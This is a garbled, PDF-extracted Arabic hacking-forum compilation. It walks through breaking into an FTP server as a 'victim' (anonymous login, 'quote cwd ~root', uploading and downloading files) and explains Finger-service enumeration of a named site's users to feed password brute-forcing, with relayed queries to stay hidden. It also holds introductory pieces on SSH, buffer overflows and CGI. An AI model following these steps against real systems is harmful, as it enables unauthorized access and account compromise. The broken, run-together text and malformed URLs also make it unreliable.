إدات حصلت على هدا الردفقدتخطیت خطو ة<br />
Anonymous acces allowed, send identify (e-mail name) as<br />
٣٣<strong>١</strong><br />
password.<br />
و الآ نأكتب الكتابةالتالیة<br />
ftp>quote cwd ~root<br />
إدات حصل ت على هداالردفقدتخطی ت خطوة<br />
530 Please login with USER and PASS<br />
ثمأكتب الكتابةالتالیة<br />
٢٦
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
ftp>quote pass ftp<br />
إدات حصلت على هداالردفقدتخطیت خطوة<br />
و نجحتفي ا لإقتحام<br />
230 Anonymous user logged in.<br />
مبروكأنتالآنفي جهازالض حیة<br />
Get<br />
ما علیكالآنالاانتقوم بإ ستعمال<br />
اوامرالا فتيبي::<br />
و طبعالنامر علیها مرورالكراملكي لاتقعوفي المشكلةالي وقع تفیها و هي نجاح ا لإقتحام من دون ما<br />
أعر ف و لافكرة علىاوامرالفتیبي وإدااردتمانتضحكو بقالیأكثر من ٢٠ دقیقة وانا مجمدالإیديو<br />
الض حیة عالقة من دونأنأعملأي شيء ولهدا<br />
قمتبحضیرال ىوامرلكيتطبقوها مباشرةا بعد نجاح ا لإقتحام<br />
Pwd<br />
لكيتعر ما یحتویه الهارد دیسك<br />
Cd<br />
لإقتحام مجلد مثال<br />
Cd black<br />
في هدا المثالقمت بإقتحام مجلد المسمىبلاك<br />
Ls<br />
لكيیتضحلك محتو ى المجلدأوالهارد دیسك<br />
لكيتحمل الى سطح المكتب بتا ع جهازك من جهازالض حیة<br />
مثال<br />
Get black.exe<br />
Put<br />
العملیةالعكسیة ل<br />
Get<br />
یعنيانتأخد مل ف من سطح المكتب بتا ع جهازك وتضعهفي جهازالض حیة<br />
مثال<br />
Put black.exe<br />
Clos<br />
لقطعالإتصال معالض حیة<br />
هديأهمالأوامر والآن سونتطرق علىأنوا ع الرسائلالينت حصل علیها من جهازالض حیة أثناءتطبیق<br />
الأوام و شرحها وارقامها<br />
Codes: Signification:<br />
Restart marker reply. <strong>١</strong><strong>١</strong>٠<br />
Service ready in nnn minutes. (nnn est un temps) <strong>١</strong>٢٠<br />
Data connection already open; transfer starting. <strong>١</strong>٢٥<br />
150 File status okay; about to open data connection.<br />
200 Command okay.<br />
202 Command not implemented, superfluous at this site.<br />
211 System status, or system help reply.<br />
٢٧
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
212 Directory status.<br />
213 File status.<br />
214 Help message.<br />
215 NAME system type.<br />
220 Service ready for new user.<br />
221 Service closing control connection.<br />
225 Data connection open; no transfer in progress.<br />
226 Closing data connection.<br />
227 Entering passive mode (h1, h2, h3, h4, p1, p2).<br />
230 User logged in, proceed.<br />
250 Requested file action okay, <strong>com</strong>pleted.<br />
257 "PATHNAME" created.<br />
331 User name okay, need password.<br />
332 Need account for login.<br />
350 Requested file action pendingfurther information.<br />
421 Service not available, closing control connection.<br />
425 Can't open data connection.<br />
426 Connection closed; transfer aborded.<br />
450 Requested file action not taken. (Fichier déjà utilisé par autre<br />
chose)<br />
451 Requested action aborded: local error processing.<br />
452 Requested action not taken. (Pas assez de mémoire pour<br />
exécuter l'action)<br />
500 Syntax error, <strong>com</strong>mand unrecognized.<br />
501 Syntax error in parameters or arguments.<br />
502 Command not implemented.<br />
503 Bad sequence of <strong>com</strong>mands.<br />
504 Command not implemented for that parameter.<br />
530 Not logged in.<br />
532 Need account for storing files.<br />
550 Requested action not taken. (Fichier non trouvé, pas d'accès<br />
possible,...)<br />
551 Requested action aborded: page type unknown.<br />
552 Requested file action aborded.<br />
553 Requested action not taken. (Nom de fichier non attribué)<br />
..........<br />
٢٨
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
بروتوكول خدمة<br />
"Finger<br />
"<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$$$$<br />
الكاتب LAMeR:<br />
$$$$$$$$$$$$<br />
شرح لاحدالبروتوكولاتالمهمةفي جمع المعلوما ت عن مستخدميالموقعاوالسیرفر<br />
للمعلومیة وقبل البدءبهذاالموضو عفهذاالبرتوكولیعمل على البورت 79<br />
1.1 مقدمة عنFinger<br />
1.2استخدامFinger<br />
ب ع ضالخد ع عنداستخدام خدمةFinger<br />
1.4الأستعلام عن طریق موقع بأستخدامFinger<br />
1.5الأستنتاج من هذا الدرس<br />
1.6الختام<br />
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^<br />
معین )<br />
.<br />
1.3<br />
1.2 مقدمة عنFinger<br />
<br />
إنّ Finger دیمون خدمةتعمل عن طریق البورت ٧٩ عادة وكانت<br />
مستخدمةأصلاكنوع businesscardرقميللناس<br />
المستخدم البعید ) user remote )یمكنأن یرسل طلبإلى Finger دیمون یجري على نظام<br />
بورت Finger نوعیة ٧٩)وسی حصل علىإجابة.<br />
هذهالإجابة ستخبرك منهم المستخدمین على هذا النظام وأیضا بع ض المعلومات عن هؤلاءالمستخدمین<br />
المتصلی نبالنظام.<br />
إ ضافةإلى هذه المعلومات،فيأغلبالأحیانالإجابةتخبركأیضا من الذي یدیر النظام admin) )وكی ف<br />
قامبالإتصال.<br />
قدیمااستخدمالناسالأتصال على جمیعانوا ع الأنظمةفيالعالم وطلبالأستعلام عن هذه الأنظمة وال<br />
Finger یعطیهممعلومات عن الموجودینفيالنظام وهللهم حساباتفي هذا النظام.وكان Fingerكان<br />
یستخدمقدیمافي الجامعات والشركاتالكبیرةأیضا.<br />
في الماضي ،ال Finger إ ستعمل عامة عن طریق الطلابفيالجامعات اذاارادوا معلوماتتخ ص طلاب<br />
اخرینفي نفسالجامعه . وكثیرا ماتكون الأجابة<br />
أعلمني<br />
أماالآن ومع وجود شبكة ا لإنترنت العالمیةاصبحFinger أقل شهرة ،لأنهتوجدالآن مواقع الویب<br />
رقمیة خاصةبمستخدمین الأنترنت وبسبب ملاحظة الناسالتهدید<br />
للعملكبطاقة<br />
الواسعللأمنالألكترونيقلّاستخدام خدمةDeamon Finger<br />
(اجابة ) Deamon Fingerبجملة " Finger<br />
" !<br />
عمل (bisinesscard)<br />
.<br />
" !meاي "<br />
علىأیة حال،لیسكلالأنظمة منعت هذهالخدمة وستجد بع ضالمواقع (الأنظمة)تقدم هذه الخدمة. وهذه<br />
الأیام یقوم الهكرزبمحاولاتاختراقالأنظمة بأستخدامبرامج portscans للب حث عن البورتات<br />
المفتوحة. . .بدونأيّأساس علمي<br />
لذلكإنّ Finger دیمون، مثال عظیملخدمةیمكناستخدامهاقانونیا لتزودك بكمیة ضخمة من المعلومات<br />
ال حسّاسة<br />
٢٩
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
حول هد ف.<br />
لهذا سو فأحاولاناشرحفي هذاالدرسبلغة مفهومة<br />
ما هو Finger دیمون وماذا یفعل وكیف یمكناستخدامهفي مصلحتك<br />
الخلاصة المقدمة:ان خدمة Fingerكانتقدیما ولازال تتستخدملجلبالمعلومات عن المستخدمین<br />
الموجودینفيالنظام وهللدیهم حساباتفي هذا النظامام لا.<br />
:<br />
ملاحظة :النظام ) server )هو جهازكمبیوترتخزنفیهمعلوماتهائلة ویستخدمفياستضافةالمواقع<br />
1.3استخدامFinger<br />
<br />
عنداستخداماي منبرامج السكان المعروفة مثل ) superscan)للب حثفي موقعمعین<br />
http://www.israel.<strong>com</strong>/ ) ووجدتبه منفذ Port)بور ت) ٧٩ مفتوحا هذایعنيان<br />
http://www.israelr.<strong>com</strong>/<br />
له Finger دیمونیعمل.<br />
عن طریق وندوز<br />
الآنكی ف<br />
صلل Finger<br />
خا فيأغلبالأحیان وندوز لا یوجدبه زبون (client) سو ف نستخدم Telnetكخادمل Finger<br />
توضیح--<br />
) مثلا<br />
مركب ) installed )لذلك<br />
نقومب request) ( طلباستعلام؟<br />
--<br />
Telnet(client) --------request-------> Finger Deamon(in Server) o<br />
الآتيفي موجة الدوس: ) DOS (MS<br />
79http://www.foobar.<strong>com</strong>/telnet<br />
.<br />
عن طریق كتابةالسطر<br />
بعد ذلك سیظهرلكبرنامج telnet و منهتطبع الأوامر<br />
اما من یونیك سلسنابحاجةإلىأن نستعملتیلن تلأنه یوجدبنظاملینوكس زبون(client) خا صبخدمة<br />
مركّب على النظامبشكل دائمتقریبا.<br />
ملاحظة سیكونالشرحالتالي حتى نهایةالدرسلمستخدميلینوك سأماأذاقررتالأستمرار بأستخدام<br />
وندوز ستكون كتابةالأوامرفي موجه الدوسثمفيالتلنت وستكون كتابة الأوامرهي نفس الأوامر التي<br />
تكتب بأستخدام نظاملینوكس ولكنبدل نضع "مسافةثم "wwwفي الوندوز مراعیااسمالموقع<br />
مثلا یكون كتابة الأوامرفيلینوكس هكذا<br />
Finger Deamon<br />
:::<br />
"@ "<br />
:<br />
finger@anyname.<strong>com</strong><br />
http://www.anyname.<strong>com</strong>/finger :<br />
لاحظالمسافةبین finger و www<br />
) على افترا ضانكتستخدم ) shell ( unix<br />
finger@israel.<strong>com</strong><br />
ولكنفي وندوز سیكون هكذا<br />
اطبعفي مح ثالأوامرفي یونكس<br />
لاحظان الهد ف (ل معرفة منهم مستخدمي هذاالموقع )هناهو /http://www.israel.<strong>com</strong>كمثال<br />
فستظهرالنتائج:<br />
Login: Name: Tty: Idle: When: Where:<br />
root israel sys console 17d Tue 10:13 node0ls3.israel.<strong>com</strong><br />
Amos Amanda <br />
Anderson Kenneth<br />
Bright Adrian<br />
Doe John<br />
٣٠
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
Johnson Peter <br />
Mitnick Kevin<br />
Munson Greg<br />
Orwell Dennis<br />
الآن ماذاتعني هذه النتائج؟<br />
نرىأسماءالمستعملین وفي الثاني" (Name) الأسماءالحقیقیة "،<br />
التيبالطبعلیست حقیقیة،لكنفيمعظم الوقت حقیقة. ویریناالعمود الثال ث(Tty) النو عالطرفي the<br />
terminal type<br />
والرابع (Idle) فترةالتوق ف.time the idle وبعد ذلكفي العمودینالخامس والسادسالوقت والمكان<br />
الذياستخدمفیهال حسابللأتصالبالنظام.<br />
..<br />
في العمودالأول( ( login<br />
أحیاناتوجدأعمدة بعنواوینالأیمیلات وأرقام هواتف الخالخاصةبمستخدمین هذاالنظامو إ ذاكنتترید<br />
المزید منالمعلومات عن مستخدممعیّ ن Johnson)بیتر Peter جونسن على سبیلالمثال)أدخلالأمر<br />
التالي :<br />
johnson@israel.<strong>com</strong>finger<br />
1.4 بع ضالخد ع عنداستخدام خدمةFinger<br />
< =========================<br />
أتمنّىالآن شاهدت ما الضع ف الرئیسيلخدمة Finger. Fingerیریك deamon ماهي<br />
ال حسابات الموجوده على النظام. وهذایعنيأنكتكسب (عن طریققانوني من المجموعة<br />
السحریة وهيكلمات السر/مجموعةأسماءالمستخدمین التي ستمن حكالدخول(Access)إلى نظام.<br />
إ ذا عرف تأسماءالمستخدمین، ستكون الخطوة القادمة متوقفه علىبرنامج bruteforceأوبمعنى آخر<br />
% ٥٠ (<br />
.....<br />
برامجتخمینالباسوورد wordlist passowrd cracker<br />
.<br />
هناك سكربتات خاصّة كتب تللتیلنت على سبیل المثالاذهبلموقع<br />
VLAD's حث عنpwscan.pl /http://www.thehackerschoice.<strong>com</strong>أواب<br />
لذلك یجب علیكانتكونقائمة بكلماتالسرفي مل ف نصي (word او المفكره ( وحاولانتكونكلمات<br />
السرقریبة منأسماءالمستخدمین وإ ذالمتعمل القائمةاستخدمبرنامج- bruteforceأنص حكبهذا<br />
الوق تانت حظرلككأس شاهيوتأخذلكاستراحة وتجعل البرنامجیعمل عمله-<br />
بالطبع نجد بع ضال حسابا تللمستخدمینللنظاماكثراهمیة من غیرها منال حسابا ت.وخاصة حسابالإدارة<br />
بسببانه عندماتعر فالباسووردالخا صبهم وقتهاتستطیعالتحكمبالموقع<br />
. وبالطبع بع ضال حسابات سهلةتخمینكلمةالسر و لهنا ك بع ضالخدعلمعرفة هذاالنو ع منال حسابا ت.<br />
على سبیلالمثال ...إ طبع الأمر :<br />
secret@israel.<strong>com</strong>finger<br />
عندماترسل هذا الأمر الي Finger Deamon سیعطیك جمیعال حساباتالتيتحتوي علىكلمة<br />
أمّافياسم المستعملأوالإسمالحقیقي.اذا، ماهوالشي المهمفي هذا؟ حسناأنتیمكنكأن<br />
تستعمل "test"أو "temp"أو "٠٠٠٠"بدلا من "secret" وكماتعر ف من المحتملان یكون<br />
هذاالنو ع من ال حسابات سهلمعرفةباسوورداتهفيأ غل ب الأحیان.<br />
finger .@israel.<strong>com</strong><br />
0@israel.<strong>com</strong>finger<br />
جرب هذه الأوامر وشاهد مایحد ث!<br />
حاولالتعر ف على Deamon، Fingerأقرأ RFCوأوجد خدعكبنفسك!<br />
( root) الجذر (Admin)أو<br />
" secret"<br />
٣<strong>١</strong>
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
1.5الأستعلام عن طریق موقع بأستخدامFinger<br />
"استعلم")<br />
"<br />
< =========================<br />
إ ذاأرد تاناستخدم خدمة) Finger معنى Fingerكفعل ألم س" ولكنهاتأتيهنابمعنى<br />
والأستعلام عن موقعمعین مثل هذاwww.victim.<strong>com</strong> وأیضاتعر فأن موقع آخر<br />
خدمة Fingerتعمل،<br />
عندها یمكننيان أقدم طلبا مثل هذا:( اكتبفي مح ث الأوامر مثل هذا ( finger@host.<strong>com</strong><br />
@victim.<strong>com</strong><br />
Host.<strong>com</strong>یستعلم (Finger) الآن victim.<strong>com</strong> ویریكالنتائج.<br />
أحدالفوائد من هذه الطریقةانك ستكون مجهوللدىvictim.<strong>com</strong> فعندماتقوم<br />
.<br />
www.host.<strong>com</strong>" "یقدم<br />
http://www.victim.<strong>com</strong>/<br />
)<br />
.<br />
بطلب سجل الدخول log) ستشاهد/http://www.host.<strong>com</strong>في سجلاتهم،بدلا منك<br />
فائدةاخر ى وهيأنك یمكنان تترك) Host موقع) یقوم ) عن طریق خدمة( Fingerبالأستعلام عن<br />
حاسوبا<br />
آخرا على نفسالشبكة ،بینمااذا طلب تانت هذا الأستعلام بأستخدام خدمة Finger من جهازكلنتكون<br />
مسموحةلكلأنك سأكون غیر موثوقبهلد ىالمستعلم عنه بعك ساذاكانالطلب ل لأ ستعلامباستخدام<br />
Fingerعن طریق موقع<br />
یعنيالخلاصة :انالموقعالذيتریدالأستعلام عنه یعتبر حاسوبك الشخصي غیر موثوقبه بعكس اذاكان<br />
الأستعلام عن طریق موقعاخر یشابههفسو ف یسمحله<br />
.!<br />
"<br />
1.6الأستنتاج من هذا الدرس<br />
< ===============><br />
( access ) یكون مصدر معلومات ضخملأي واحد یحاولكسبالدخول Fingerیمكنأن Deamon<br />
إلىالنظام.<br />
Fingerقانونیایزوّدكبنص deamon فكلماتالسر واسماءالمستخدمینالتيتحتاجهالكسب<br />
الدخول.access<br />
هناكبضعة خد علطیفةتمكنك منمعرفة حسابات خاصةتب حث عنها منمعرفتكلهذهال حسابا تتستطیع<br />
كسرالباسووردات، بإ ستعمالتقنیة wordlistأو.bruteforce<br />
تذكّ رفوائد الأستعلام عن طریق موقع"أیضا بأستعمالdeamon Finger<br />
...<br />
٣٢
"شرح ال<br />
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
"secure shell<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$$$$$$$$$$$$<br />
الكاتب BURN_EG: ACID<br />
$$$$$$$$$$$$$$$$$$$<br />
قداسبقهاالكاتببمقدمة من عنده ....<br />
تعتبرأداة secure shell منأهمالادواتفىالشبكاتوتعتبر هامة جدابالنسبةلمخترقيالمواقع و<br />
تستخدمهامعظمالسی رفرات علىالانترنت و غالبا ما نجدهابهذاالاختصار:: SSh<br />
ما هىال SSh؟<br />
==============<br />
ال secureهىاداه shell (برنامج)للاتصال و الدخول الىكمبیوتراو جهازاخر علىالشبكة لتنفیذ<br />
اوامراو مهاممعینه داخل هذاالجهازبمعنىالاتصال عن بعد remotelyوتستخدم connection<br />
ایضافى نقلالملفات منكمبیوتر الىاخر و هىتقدمتوثیققو ىو اتصالامن جدا فىقنواتالاتصال<br />
الغیرامنه وهىتعتبركبدیل جید جداا لادوا تتستعمللنفسالغر ضفى یونكس مثل (rlogin,rsh and<br />
rcp).<br />
وتقدمایضاال secure shell اتصالامن جدالشحنات اتصالاتال tcpكونیكشن .<br />
و هنا یأتى سؤال مهم :: و السؤال هو<br />
::<br />
لماذا یفضلاستخدامال secure shell علىالادواتالاخر ىالتى یطلق علیها -rفى <strong>com</strong>mands<br />
یونكس كالمذكورینفىالاعلى ؟<br />
======================<br />
فىتوزیعاتالیونكس مثلال BSD*ت تعر ض الادواتالتى یطلق علیها -r <strong>com</strong>mands مثل<br />
rcp) rlogin,rsh and )الىانوا ع مختلفه من الهجمات حیثانهلو شخ صاستطا عان یكتسبال<br />
روتاكسیس access) root)للاجهزهالتى على الشبكهبطریقه مااو فعلها ن طریق اتصالفیزیائى<br />
ا ى ریموتلى یمكنهان یدخلالىكلبیاناتالاجهزه التى علىالشبكهبدونادنىصعوبه لانه یستطیع<br />
بالروتاكس سان یعبر من خلالا ىاداه منالمذكورهفى یونكسبدون ا ىصعوبه و یمكنهتفادیهابطرق<br />
معینه و هذا ما یسمى بأنالشخ صلدیه unauthorized access to systems اعتقدانكم<br />
فهمتونىالانو یمكنایضا لا ى شخ صانیراقب النت وركترافیك و یلتقطكلالباكیدجس من خلال<br />
شبكتك وتكون هذهالباكیدجستحتوى علىالباسوردسللسیستمل شبكتك.<br />
ملحوظه: طریقه مراقبهالنت وركترافیكهى طریقه حقیقیهفىالاختراق وتستخدمفىاختراقالمنظمات<br />
الكبر ى وتقعتح تبندتقفىالاثر والاعدادللاخت راق<br />
والاننعود الىالسیكیور شیلومزایاالسیكیور شیلتظهر هنا معكل عیوبالادواتفى یونكس<br />
فالسیكیورشیل یطالب الشخ صالذ ىلدیه الروت اكسسایضا بأنیتصل اتصال موثوق عبره ا ىلایعطیه<br />
الح قللدخول الىبیانا تاجهزهالشبكهالابالباسورد و لا یمكن التحایل علىال sshفى هذهالنقطه و<br />
بذلك حتىلوتمكنالشخ ص مناكتساب الروتاكس سلن یستطسعالاطلا ع علىبیانات الشبكه الا ب<br />
. (<br />
authorized access to systems .<br />
و النقطه الثانیههىاناذا حاولاحداختراقك عن طریق مراقبه النت ورركترافیكلشبكتك والتقاط<br />
الباكیدجسالتىتحمل معلوماتك وباسورداتكفسیخیبامله لان السیكیور شیل لا یرسل الباسورداتفى<br />
صوره واضحهكماترسلهاادوات یونكسالاخر ى ولكن یرسلها مشفره ولذلك سیكون علىالمخترق<br />
٣٣
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
(<br />
محاولهفك الشفره والخ<br />
ولكن معكل هذه المزایالم یخلىال secure shell من الثغرات ولكنتعتبرثغراتهقلیلة وتقریبا<br />
معظمها یحتاجالىالرووتاكسس والاخرى یمكنانتخترقالسیكیور شلفقطبها (هذاكلامبینى وبینكم<br />
والان سؤالاخر<br />
.<br />
.<br />
::<br />
ما هىانوا عالهجومالتىتحمى منهاال ssh؟<br />
==========================<br />
<strong>١</strong>-تحمى منال ip spoofing اىتحمى منانتحال عنواینالا ىبى حیثانهلوارسل شخ ص ما<br />
باكیدجس منا ىبى یظهرانه موثوقبه ولكنهفىالحقیقهلیس موثوقبه یكشفهال sshوتحمىایضا<br />
من المنت حلین على الشبكهالم حلیهاى. localy<br />
٢-تحمى مما یسمىال DNS spoofing<br />
٣-تعتر ض ظهورالتیكستسالتى یكون مخزن علیهاالباسورداتالواضحه وبیانات الهوستس .<br />
٤ -تحمیك منمعالجهالبیاناتالمخزنهاىتمنعا ى شخ ص غیر موثوقبه من عملایدیت لا ى داتا مخزنه<br />
.<br />
ولكن معكل هذافأنال sshلی سامنبدرجهكبیره حیثانالاشخا ص ذو خبرهكبیرهفى النت ورك<br />
یستطیعونان یجعلونال sshینقطع عنالاتصا لاى disconnected ولكن لا یمكنان یكسرو<br />
تشفیربیاناتهاویعیدواتشغیل الترافیك الذ ىكان ینقلها .<br />
وایضاكلالاشیاءالتىتكلمنا عنهابلأعلى سو فتعملفقطاذاكن تتستخدم خاصیهالتشفیر التىتسمح<br />
لكبهاال ssh و هىتسمح بأكثر من<br />
ماترید منهم وایضا هناكاوبشناى خیارفىالاداهتسمح<br />
لك بعدمتشغیلالتشفیرا ى" encryption of type "none وبهذاتجعلنىاقول علیكاحمق !لان<br />
هذا یجعلال ssh سهله الاختراق مثلالادواتالتىتم ذكرهافىاولالمو ضو عفى یونكس حیثان هذا<br />
ال ssh<br />
نوعتشفیر مثل-RC4 (three-key triple-DES, DES,<br />
Blowfish) TSS, ,128یمكنكاستخدام<br />
،<br />
التشفیر ایضا یمنعال ipوال spoofing DNS spoofing و هذاایضابالاضافهالىتغییر مفاتیح<br />
فكالتشفیركل فترهمعینه ویتمتدمیر مفاتیحالتدمیر التىتماستعمالهاتماما.<br />
اذنفهىاداه حقا ممیزه وتستحقالاحترام والاهتمام معانها لاتخلو من الثغرات ولكنلنجعلهاافضل<br />
ال موجود حالیافى هذاالمجا ل...<br />
٣٤
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
شرح معنى الOverflows Buffer<br />
"<br />
$$$$$$$$$$<br />
الكاتب : Lamer<br />
$$$$$$$$$$<br />
وتوجد العدید منالكتاباتفي هذاالموضو علكني حاول تاناكتببطریقة مبسطةاكثر حول هذاالموضو ع<br />
بطریقة یفهمهاالجمیع<br />
- <strong>١</strong> ماهو ال Buffer؟ Overflow<br />
-٢ المعالجه(Proccess (<br />
٣-إدارة الذاكره(management (Memory<br />
٤-استغلال ماذكرفي الOverflow Buffer<br />
*یجب علىكل مختر قانیتعلمكل مهمفيالبرامج وادارة الذاكرة ومواطنضعفها وقوتهالیستطیع<br />
التعاملمعها والتحایل علیها ومن هذاالمنطبقكان هذاالمقال .....<br />
ماهو الOverflow Buffer؟<br />
.<br />
-<strong>١</strong><br />
------------------------------------<br />
Buffer Overflow<br />
حالةتحد ثلبرنامجبسبب خللبرمجيفيبرمجتة هذا البرنامج<br />
احد ثثغرة یمكنكأستغلالها من نو ع Bufferتسمىفایروس Overflow ، red' 'code التيأستغلت<br />
في خادم IISلمایكروسوف ت- -MS web server<br />
عموما، یحد ث Buffer Overflow عندما یظهربرنامج ما متغیّرب حجمثابت (على سبیل المثال، حجم<br />
٢٠بای ت) والقیمةالتي خصّصتإلى هذهالمتغیّ رأكبر من حجمالمتغیّ ر.<br />
خذ هذا المثال :<br />
یظهربرنامجي علىالشاشة هذها ال رجاءادخالاسمالمستخدم "وانا مثلابرمجة هذا البرنامج<br />
بح ث یكون منطقیااناسمالمستخدملنیتجاوزفياسوأالحالات ٣٠ حرفا مثلا<br />
البرنامجبشكل طبیعيلكن متىتكون المشكلة<br />
المشكلة هناتكوناذاتمادخل مثلا ٢٠٠ حر فكاسمللمستخدمفالبیانات هذهالزائدةتكون عبارة عن<br />
طفحان وهو ما یسمىبال Overflow" "على الذاكرةالتي خصّصتلمتغیّ رالاسم.<br />
عندما یبدأالبرنامج،تخصّ صالذاكرة<br />
STRING(30) وسیعمل<br />
.....<br />
لجملة: "<br />
:<br />
اذنكی فأستغلّ هذا الخطأ؟؟؟<br />
قبلأنتصل لاجابةعلى هذا السؤال سنأخذ جولة حول مایتعلقبهذاالامرفيبنیة الحاسزب.<br />
في هذه المقالة سنناق ش نظاملینكس ،linuxلكن المفهوم مماثللباقي الأنظمة.<br />
- ٢<br />
المعالجه:(Proccess (<br />
---------------------------<br />
٣٥
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
إنّ الوحدة الوظیفیةالأساسیةفي حاسوبیعمل هي عملیة المعالجه.(Proccess)في الحاسوبهنالك<br />
العدید منالعملیات ونظامالتشغیل مسؤول عنتقسیم القوّةالتيتجعل العدید من العملیاتتعملفي نفس<br />
الوقتفي الحاسوب.<br />
ص حیح...كی فاذن؟؛ان َّ وحدة<br />
لیسهناك شيءإسمه<br />
تنتقلبینالعملیاتكلُ على حدهبسرعةكبیرهب حی ثتبدو مثلالعدید منالمهام<br />
المعالجةا<br />
التيتعملفي وقت واحد،<br />
.. (:<br />
" متعددالعملیات proccesses" Multi-<br />
لمركزیة (CPU)<br />
اذاتبدولناكأنالعملیاتتعملفي وقت واحد وهذه من خد ع الحاسوبالتيیؤدیها علینا<br />
كلّ عملیةلها عنوانفاضي منالذاكره ، ولایمكنلأي عملیةآخر ىتدخلفي هذاالمكان الفاضي من<br />
الذاكرة. وهذا یرشدناالى شياخر یجبانتفهمه وهو :<br />
- ٣ إدارة الذاكره:(management (Memory<br />
------------------------------------------------<br />
تدیرأنظمة التشغیل-systems operating -الحدیثة ذاكرةافتراضیة(memory virtual ظاهریة).<br />
وهذه الذاكرةتفید عندما یكونلدینا عددكبیر منالمهام موجه الى الذاكرةالحقیقةالرام ... وفي نفس<br />
الوقتفالذاكرةالحقیقةأصغر منكمیةالمهام الموجههللذاكرةالحقیقة<br />
هنا یأتي دور الذاكرةالافتراضیة حی ثتقومبخزنالبیاناتاو المهامفي مكان ما على الهاردیسكفي<br />
وتعامل هذهالبیانات وكأنهافيالذاكرةتماما ویتم<br />
منطقة یطلق علیهاال<br />
عملیة نقلها من والى الذاكرةبادارة هذه الذاكرةالافتراضیة من خلال عملیة یطلق علیها<br />
وهذا ملخ ص عنالذاكرةالافتراضیةاما الذاكرةالحقیقةفهيمعروفةلد ىالجمیع والتي یطلق علیها<br />
swapping<br />
)<br />
...<br />
Back store او SWAP<br />
READ ONLY MEMORY او الذاكرةالفیزیائیة ...<br />
(RAM<br />
------<br />
٤-استغلال ماذكرفي الOverflow Buffer<br />
---------------------------------------------<br />
الآن نصلإلىالجزء الأهم والمرح ....كی ف نستفید منالذيقلنا عنالمعالجة وإدارةالذاكرةللوصول<br />
والدخولالى الجذر (Root) وأختراق النظام؟تذكّر ن حنقلنافي وقت سابق بأنّه عندما یكون<br />
الإدخال( البیانا ت) منالمستخدمأكبر حجما منالذاكرةالتي خصّصتلهذه البیانات ،البیاناتالزائدة ستفی ض<br />
فيالذاكرة التي بعدالاسمالمتغیّ ر؟ هذا المكان من الذاكرة هوالمكان الذي نستفید منهفي<br />
الأختراق.<br />
ماذانعملفي ذلك المكان: داخل خط ) مكان)البیاناتالتي ید خلها المستخدم فيالمثالالسابق وهوالاسم<br />
الأول الذي یطلب منقبل البرنامجثمأدخلناه نضعالأوامر الأكثرشعبیةللحاسوب، حی ث هذهالأوامر<br />
تجعل الحاسوب یحد ث(ینتج)هیكل نستطیعاستخدامهفیما بعدللقیامبالسیطرة الكاملةللنظامالمستغلّ.<br />
القیامبهذاالعمللی سبیسطاكما یبدولك،إذنلوأردتمعرفةكی فیعمل ،أنت یجبأنتقرأ المقالة<br />
القادمة حول Overflows، Buffer الذي سیص فبالضبطكی ف لإ ستغلال واحده منال Buffer<br />
فيا لإختراق<br />
)<br />
(<br />
.<br />
( overflow)<br />
Overflows<br />
٣٦
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
كانت هذهةمقدمةبسیطة ومهمةللمخترقینلأنها ست ردد علیهمكثیرافي مواقع السیكیورتي حیث یوجد<br />
العدید من الثغرات حول هذه المشاكلامافي وقت المعالجةاوفي الطفحانالحاد ثفي الذاكرةنتیجةلما<br />
سبق ذكره ....<br />
٣٧
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
ال CGI وعلاقتها بالإنترنت<br />
"<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
$$$$$$$$$$$<br />
م ن ق ول<br />
$$$$$$$$$$$<br />
في هذا المل ف سو ف نقوم بعر ض مقدمةال CGI و علاقتهابالانترنت :<br />
CGI مقدمةلل<br />
(<strong>١</strong>)<br />
CGI=COMMON GATEWAY INTERFACE<br />
هيالواجهةالتيتسمحبالاتصالبین جانب<br />
المستخدم عن طریقالمتصفحأو البرامج و خلافه و جانبالویب سیرفرالذي یفهمبروتوكول<br />
(HTTP)<br />
) ٨٠<br />
.<br />
ال TCP/IP هوالبروتوكول الذي ی ستخدمه سكریبتالسي جيأي والسیرفر أثناءالاتصال .البورت<br />
المحددةلهذالبروتوكولهي من الممكنأن تتغیر هذه البور ت) .<br />
تستطیع سكریبتاتالسي جيأيأنتقوم بتولید صفحات الویب والصور وأیضانتائج محددة طبقا<br />
لمدخلاتمعینه یقوم<br />
